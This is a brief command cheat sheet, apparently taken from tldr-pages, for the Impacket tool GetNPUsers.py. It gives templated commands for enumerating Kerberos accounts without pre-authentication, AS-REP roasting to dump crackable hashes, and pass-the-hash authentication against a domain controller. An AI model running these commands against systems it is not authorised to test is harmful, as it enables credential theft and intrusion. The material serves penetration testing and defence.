; This has been extracted from
; https://github.com/tldr-pages/tldr/blob/master/pages/common/getnpusers.py.md

% getnpusers.py, common

# Enumerate users with Kerberos pre-authentication disabled (default anonymous enumeration)
GetNPUsers.py <domain>/ -usersfile <path_to_userslist> -dc-ip <domain_controller_ip>

# Perform AS-REP roasting and dump crackable hashes for offline cracking
GetNPUsers.py <domain>/ -usersfile <path_to_userslist> -dc-ip <domain_controller_ip> -request

# Authenticate with valid credentials (if anonymous binding is disabled)
GetNPUsers.py <domain>/<username>:<password> -usersfile <path_to_userslist> -dc-ip <domain_controller_ip>

# Use pass-the-hash authentication instead of a password
GetNPUsers.py <domain>/<username> -hashes <LM_Hash>:<NT_Hash> -usersfile <path_to_userslist> -dc-ip <domain_controller_ip>

# Save the output to a file for further analysis
GetNPUsers.py <domain>/ -usersfile <path_to_userslist> -dc-ip <domain_controller_ip> -request > <output.txt>
